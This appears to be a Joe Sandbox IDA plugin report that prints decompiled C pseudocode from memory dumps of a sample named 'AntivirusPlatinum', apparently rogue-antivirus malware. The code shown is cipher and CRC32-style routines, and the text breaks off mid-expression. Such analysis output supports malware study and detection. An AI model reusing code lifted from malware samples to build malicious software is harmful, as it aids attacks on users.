                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f47b40baf411e24a56174d0a2faf233069d8d5316453ed0ac0ba42447a5e2899
                                                                                                                                                      • Instruction ID: 5d2bc7e4f08e954521d2575b6f364abe5586a069ccf0d2dd76d7a464feb089a4
                                                                                                                                                      • Opcode Fuzzy Hash: f47b40baf411e24a56174d0a2faf233069d8d5316453ed0ac0ba42447a5e2899
                                                                                                                                                      • Instruction Fuzzy Hash: AE81CF1620E2E18EE71AC73C14A85F73ED20F72104B2E44EE84CE5B2D7D8650A6AC66D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00409B36(void* __ecx, void* __eflags, char _a4, signed int* _a8) {
                                                                                                                                                      				signed int _v5;
                                                                                                                                                      				signed int _v6;
                                                                                                                                                      				signed int _v7;
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				signed int _v9;
                                                                                                                                                      				signed int _v10;
                                                                                                                                                      				signed int _v11;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				signed int _v13;
                                                                                                                                                      				signed int _v14;
                                                                                                                                                      				signed int _v15;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				signed int _v17;
                                                                                                                                                      				signed int _v18;
                                                                                                                                                      				signed int _v19;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				void* _t242;
                                                                                                                                                      				void* _t268;
                                                                                                                                                      				signed int* _t270;
                                                                                                                                                      
                                                                                                                                                      				_t268 = __ecx;
                                                                                                                                                      				E00409970( &_v20, _a4, __ecx + 0xb4);
                                                                                                                                                      				_t270 = _a8;
                                                                                                                                                      				 *_t270 =  *(0x4178a8 + (_v20 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v7 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v10 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v13 & 0x000000ff) * 4);
                                                                                                                                                      				_t270[1] =  *(0x4178a8 + (_v16 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v19 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v6 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v9 & 0x000000ff) * 4);
                                                                                                                                                      				_t270[2] =  *(0x4178a8 + (_v12 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v15 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v18 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v5 & 0x000000ff) * 4);
                                                                                                                                                      				_t242 = _t268 + 0xa4;
                                                                                                                                                      				_t270[3] =  *(0x4178a8 + (_v8 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v11 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v14 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v17 & 0x000000ff) * 4);
                                                                                                                                                      				_a4 = 8;
                                                                                                                                                      				do {
                                                                                                                                                      					E00409970( &_v20, _t270, _t242);
                                                                                                                                                      					 *_t270 =  *(0x4178a8 + (_v20 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v7 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v10 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v13 & 0x000000ff) * 4);
                                                                                                                                                      					_t270[1] =  *(0x4178a8 + (_v16 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v19 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v6 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v9 & 0x000000ff) * 4);
                                                                                                                                                      					_t270[2] =  *(0x4178a8 + (_v12 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v15 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v18 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v5 & 0x000000ff) * 4);
                                                                                                                                                      					_t242 = _t242 - 0x10;
                                                                                                                                                      					_t109 =  &_a4;
                                                                                                                                                      					 *_t109 = _a4 - 1;
                                                                                                                                                      					_t270[3] =  *(0x4178a8 + (_v8 & 0x000000ff) * 4) ^  *(0x4174a8 + (_v11 & 0x000000ff) * 4) ^  *(0x4170a8 + (_v14 & 0x000000ff) * 4) ^  *(0x416ca8 + (_v17 & 0x000000ff) * 4);
                                                                                                                                                      				} while ( *_t109 != 0);
                                                                                                                                                      				E00409970( &_v20, _t270, _t268 + 0x24);
                                                                                                                                                      				_t115 = (_v20 & 0x000000ff) + 0x418cc8; // 0x8239e37c
                                                                                                                                                      				 *_t270 =  *_t115;
                                                                                                                                                      				_t270[0] =  *((intOrPtr*)((_v7 & 0x000000ff) + 0x418cc8));
                                                                                                                                                      				_t270[0] =  *((intOrPtr*)((_v10 & 0x000000ff) + 0x418cc8));
                                                                                                                                                      				_t270[0] =  *((intOrPtr*)((_v13 & 0x000000ff) + 0x418cc8));
                                                                                                                                                      				_t126 = (_v16 & 0x000000ff) + 0x418cc8; // 0xd56a0952
                                                                                                                                                      				_t270[1] =  *_t126;
                                                                                                                                                      				_t270[1] =  *((intOrPtr*)((_v19 & 0x000000ff) + 0x418cc8));
                                                                                                                                                      				_t270[1] =  *((intOrPtr*)((_v6 & 0x000000ff) + 0x418cc8));
                                                                                                                                                      				_t270[1] =  *((intOrPtr*)((_v9 & 0x000000ff) + 0x418cc8));
                                                                                                                                                      				_t138 = (_v12 & 0x000000ff) + 0x418cc8; // 0xd56a0952
                                                                                                                                                      				_t270[2] =  *_t138;
                                                                                                                                                      				_t270[2] =  *((intOrPtr*)((_v15 & 0x000000ff) + 0x418cc8));
                                                                                                                                                      				_t270[2] =  *((intOrPtr*)((_v18 & 0x000000ff) + 0x418cc8));
                                                                                                                                                      				_t270[2] =  *((intOrPtr*)((_v5 & 0x000000ff) + 0x418cc8));
                                                                                                                                                      				_t270[3] =  *((intOrPtr*)((_v8 & 0x000000ff) + 0x418cc8));
                                                                                                                                                      				_t270[3] =  *((intOrPtr*)((_v11 & 0x000000ff) + 0x418cc8));
                                                                                                                                                      				_t270[3] =  *((intOrPtr*)((_v14 & 0x000000ff) + 0x418cc8));
                                                                                                                                                      				_t270[3] =  *((intOrPtr*)((_v17 & 0x000000ff) + 0x418cc8));
                                                                                                                                                      				return E00409970(_t270, _t270, _t268 + 0x14);
                                                                                                                                                      			}






















                                                                                                                                                      0x00409b3f
                                                                                                                                                      0x00409b4f
                                                                                                                                                      0x00409b80
                                                                                                                                                      0x00409b87
                                                                                                                                                      0x00409bb5
                                                                                                                                                      0x00409be4
                                                                                                                                                      0x00409c0f
                                                                                                                                                      0x00409c15
                                                                                                                                                      0x00409c18
                                                                                                                                                      0x00409c1f
                                                                                                                                                      0x00409c25
                                                                                                                                                      0x00409c5a
                                                                                                                                                      0x00409c88
                                                                                                                                                      0x00409cb7
                                                                                                                                                      0x00409ce2
                                                                                                                                                      0x00409ce5
                                                                                                                                                      0x00409ce5
                                                                                                                                                      0x00409ce8
                                                                                                                                                      0x00409ce8
                                                                                                                                                      0x00409cfa
                                                                                                                                                      0x00409d03
                                                                                                                                                      0x00409d09
                                                                                                                                                      0x00409d15
                                                                                                                                                      0x00409d22
                                                                                                                                                      0x00409d2f
                                                                                                                                                      0x00409d36
                                                                                                                                                      0x00409d3c
                                                                                                                                                      0x00409d49
                                                                                                                                                      0x00409d56
                                                                                                                                                      0x00409d63
                                                                                                                                                      0x00409d6a
                                                                                                                                                      0x00409d70
                                                                                                                                                      0x00409d7d
                                                                                                                                                      0x00409d8a
                                                                                                                                                      0x00409d97
                                                                                                                                                      0x00409da4
                                                                                                                                                      0x00409db1
                                                                                                                                                      0x00409dbe
                                                                                                                                                      0x00409dd1
                                                                                                                                                      0x00409ddd

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7327f78a1deb69ccabe1a6d40b77589da036301b0cba6a48ce36b16b58229863
                                                                                                                                                      • Instruction ID: 7a05ca3c6aa45f7c0c3d5be354b359d1162ea9d394a588887a6fdbb73b53b832
                                                                                                                                                      • Opcode Fuzzy Hash: 7327f78a1deb69ccabe1a6d40b77589da036301b0cba6a48ce36b16b58229863
                                                                                                                                                      • Instruction Fuzzy Hash: AE914D648192D46ECB029FB594608FABFF0DE1B211B0E84DEE4E997293D138D364DB74
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                      			E004099A2(intOrPtr __ecx, signed int _a4) {
                                                                                                                                                      				signed int* _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				signed char _v29;
                                                                                                                                                      				signed char _v30;
                                                                                                                                                      				signed char _v31;
                                                                                                                                                      				signed char _v32;
                                                                                                                                                      				char _v40;
                                                                                                                                                      				signed int _v41;
                                                                                                                                                      				signed int _v42;
                                                                                                                                                      				signed int _v43;
                                                                                                                                                      				signed int _v44;
                                                                                                                                                      				signed int _t60;
                                                                                                                                                      				char* _t64;
                                                                                                                                                      				signed int _t65;
                                                                                                                                                      				signed int _t70;
                                                                                                                                                      				void* _t72;
                                                                                                                                                      				void* _t73;
                                                                                                                                                      				void* _t74;
                                                                                                                                                      				void* _t85;
                                                                                                                                                      				void* _t91;
                                                                                                                                                      				void* _t97;
                                                                                                                                                      				void* _t110;
                                                                                                                                                      
                                                                                                                                                      				_v12 = __ecx;
                                                                                                                                                      				E0040A2B6(__ecx,  &_v44, _a4, 0x20);
                                                                                                                                                      				_t60 = 0;
                                                                                                                                                      				_t72 = 0;
                                                                                                                                                      				_a4 = 0;
                                                                                                                                                      				_t65 = 0;
                                                                                                                                                      				_t73 = 4;
                                                                                                                                                      				while(_t60 <= 0xa) {
                                                                                                                                                      					if(_t65 >= _t73) {
                                                                                                                                                      						L6:
                                                                                                                                                      						_t97 = _t72 - _t73;
                                                                                                                                                      					} else {
                                                                                                                                                      						_v8 = _t91 + _t65 * 4 - 0x28;
                                                                                                                                                      						while(_t72 < _t73) {
                                                                                                                                                      							_v8 = _v8 + _t73;
                                                                                                                                                      							_t65 = _t65 + 1;
                                                                                                                                                      							_t72 = _t72 + 1;
                                                                                                                                                      							asm("movsd");
                                                                                                                                                      							if(_t65 < _t73) {
                                                                                                                                                      								continue;
                                                                                                                                                      							} else {
                                                                                                                                                      								goto L6;
                                                                                                                                                      							}
                                                                                                                                                      							goto L7;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					L7:
                                                                                                                                                      					if(_t97 == 0) {
                                                                                                                                                      						_t60 = _t60 + 1;
                                                                                                                                                      						_a4 = _t60;
                                                                                                                                                      						_t72 = 0;
                                                                                                                                                      					}
                                                                                                                                                      					if(_t65 < _t73) {
                                                                                                                                                      						continue;
                                                                                                                                                      					} else {
                                                                                                                                                      						if(_t60 <= 0xa) {
                                                                                                                                                      							_v8 = 0x418ca8;
                                                                                                                                                      							do {
                                                                                                                                                      								_v43 = _v43 ^  *((_v30 & 0x000000ff) + 0x418dc8);
                                                                                                                                                      								_v42 = _v42 ^  *((_v29 & 0x000000ff) + 0x418dc8);
                                                                                                                                                      								_v41 = _v41 ^  *((_v32 & 0x000000ff) + 0x418dc8);
                                                                                                                                                      								_v8 =  &(_v8[0]);
                                                                                                                                                      								_v44 = _v44 ^  *((_v31 & 0x000000ff) + 0x418dc8) ^  *_v8;
                                                                                                                                                      								_t64 =  &_v40;
                                                                                                                                                      								_t74 = 3;
                                                                                                                                                      								do {
                                                                                                                                                      									_t85 = 0;
                                                                                                                                                      									do {
                                                                                                                                                      										 *(_t64 + _t85) =  *(_t64 + _t85) ^  *(_t64 + _t85 - 4);
                                                                                                                                                      										_t85 = _t85 + 1;
                                                                                                                                                      									} while (_t85 < _t73);
                                                                                                                                                      									_t64 = _t64 + _t73;
                                                                                                                                                      									_t74 = _t74 - 1;
                                                                                                                                                      								} while (_t74 != 0);
                                                                                                                                                      								_t70 = 0;
                                                                                                                                                      								while(_a4 <= 0xa) {
                                                                                                                                                      									if(_t70 >= _t73) {
                                                                                                                                                      										L22:
                                                                                                                                                      										_t110 = _t72 - _t73;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t60 = _t91 + _t70 * 4 - 0x28;
                                                                                                                                                      										while(_t72 < _t73) {
                                                                                                                                                      											_t70 = _t70 + 1;
                                                                                                                                                      											_t60 = _t60 + _t73;
                                                                                                                                                      											_t72 = _t72 + 1;
                                                                                                                                                      											asm("movsd");
                                                                                                                                                      											if(_t70 < _t73) {
                                                                                                                                                      												continue;
                                                                                                                                                      											} else {
                                                                                                                                                      												goto L22;
                                                                                                                                                      											}
                                                                                                                                                      											goto L23;
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									L23:
                                                                                                                                                      									if(_t110 == 0) {
                                                                                                                                                      										_a4 = _a4 + 1;
                                                                                                                                                      										_t72 = 0;
                                                                                                                                                      									}
                                                                                                                                                      									if(_t70 < _t73) {
                                                                                                                                                      										continue;
                                                                                                                                                      									} else {
                                                                                                                                                      										goto L26;
                                                                                                                                                      									}
                                                                                                                                                      									goto L27;
                                                                                                                                                      								}
                                                                                                                                                      								goto L27;
                                                                                                                                                      								L26:
                                                                                                                                                      							} while (_a4 <= 0xa);
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					break;
                                                                                                                                                      				}
                                                                                                                                                      				L27:
                                                                                                                                                      				return _t60;
                                                                                                                                                      			}

























                                                                                                                                                      0x004099b4
                                                                                                                                                      0x004099b7
                                                                                                                                                      0x004099bc
                                                                                                                                                      0x004099c0
                                                                                                                                                      0x004099c2
                                                                                                                                                      0x004099c5
                                                                                                                                                      0x004099c7
                                                                                                                                                      0x004099c8
                                                                                                                                                      0x004099d3
                                                                                                                                                      0x004099f7
                                                                                                                                                      0x004099f7
                                                                                                                                                      0x004099d5
                                                                                                                                                      0x004099d9
                                                                                                                                                      0x004099dc
                                                                                                                                                      0x004099ed
                                                                                                                                                      0x004099f0
                                                                                                                                                      0x004099f1
                                                                                                                                                      0x004099f4
                                                                                                                                                      0x004099f5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004099f5
                                                                                                                                                      0x004099dc
                                                                                                                                                      0x004099f9
                                                                                                                                                      0x004099f9
                                                                                                                                                      0x004099fb
                                                                                                                                                      0x004099fc
                                                                                                                                                      0x004099ff
                                                                                                                                                      0x004099ff
                                                                                                                                                      0x00409a03
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409a05
                                                                                                                                                      0x00409a08
                                                                                                                                                      0x00409a0e
                                                                                                                                                      0x00409a15
                                                                                                                                                      0x00409a30
                                                                                                                                                      0x00409a3d
                                                                                                                                                      0x00409a4b
                                                                                                                                                      0x00409a4e
                                                                                                                                                      0x00409a53
                                                                                                                                                      0x00409a56
                                                                                                                                                      0x00409a59
                                                                                                                                                      0x00409a5a
                                                                                                                                                      0x00409a5a
                                                                                                                                                      0x00409a5c
                                                                                                                                                      0x00409a60
                                                                                                                                                      0x00409a63
                                                                                                                                                      0x00409a64
                                                                                                                                                      0x00409a68
                                                                                                                                                      0x00409a6a
                                                                                                                                                      0x00409a6a
                                                                                                                                                      0x00409a6d
                                                                                                                                                      0x00409a6f
                                                                                                                                                      0x00409a77
                                                                                                                                                      0x00409a99
                                                                                                                                                      0x00409a99
                                                                                                                                                      0x00409a79
                                                                                                                                                      0x00409a79
                                                                                                                                                      0x00409a7d
                                                                                                                                                      0x00409a90
                                                                                                                                                      0x00409a91
                                                                                                                                                      0x00409a93
                                                                                                                                                      0x00409a96
                                                                                                                                                      0x00409a97
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409a97
                                                                                                                                                      0x00409a7d
                                                                                                                                                      0x00409a9b
                                                                                                                                                      0x00409a9b
                                                                                                                                                      0x00409a9d
                                                                                                                                                      0x00409aa0
                                                                                                                                                      0x00409aa0
                                                                                                                                                      0x00409aa4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409aa4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409aa6
                                                                                                                                                      0x00409aa6
                                                                                                                                                      0x00409a15
                                                                                                                                                      0x00409a08
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409a03
                                                                                                                                                      0x00409ab4
                                                                                                                                                      0x00409ab4

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0f1e198a405bd47bcbd999037dcf98d9ca0490093b358bc2e120bb77b8d572e2
                                                                                                                                                      • Instruction ID: 8db506cccaca7ad31332262a737b3017699621a350de5aec0ff0f078f6a8288b
                                                                                                                                                      • Opcode Fuzzy Hash: 0f1e198a405bd47bcbd999037dcf98d9ca0490093b358bc2e120bb77b8d572e2
                                                                                                                                                      • Instruction Fuzzy Hash: 7931C872A002D59ECF158FB594905EEBFB1DE69328F29807FC88177282D2355D86CB94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00402CC5(signed char _a4, signed char _a8, unsigned int _a12) {
                                                                                                                                                      				signed char _t28;
                                                                                                                                                      				signed char _t30;
                                                                                                                                                      				signed char _t53;
                                                                                                                                                      				void* _t54;
                                                                                                                                                      				unsigned int _t71;
                                                                                                                                                      				unsigned int _t74;
                                                                                                                                                      
                                                                                                                                                      				if( *0x4141c4 == 0) {
                                                                                                                                                      					E00402C9B();
                                                                                                                                                      				}
                                                                                                                                                      				_t53 = _a8;
                                                                                                                                                      				_t28 = _a4;
                                                                                                                                                      				_t74 = _a12;
                                                                                                                                                      				while(_t74 > 0 && (_t53 & 0x00000007) != 0) {
                                                                                                                                                      					_t28 = _t28 >> 0x00000008 ^  *(0x4141c0 + ( *_t53 & 0x000000ff ^ _t28 & 0x000000ff) * 4);
                                                                                                                                                      					_t74 = _t74 - 1;
                                                                                                                                                      					_t53 = _t53 + 1;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t74 >= 8) {
                                                                                                                                                      					_t71 = _t74 >> 3;
                                                                                                                                                      					do {
                                                                                                                                                      						_t30 = _t28 ^  *_t53;
                                                                                                                                                      						_t53 = _t53 + 8;
                                                                                                                                                      						_t74 = _t74 - 8;
                                                                                                                                                      						_t28 = (((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) >> 0x00000008 ^  *(0x4141c0 + (( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((( *(0x4141c0 + ((((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t53 - 4) ^ (((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4141c0 + ((_t30 >> 0x00000008 ^  *(0x4141c0 + (_t30 & 0x000000ff) 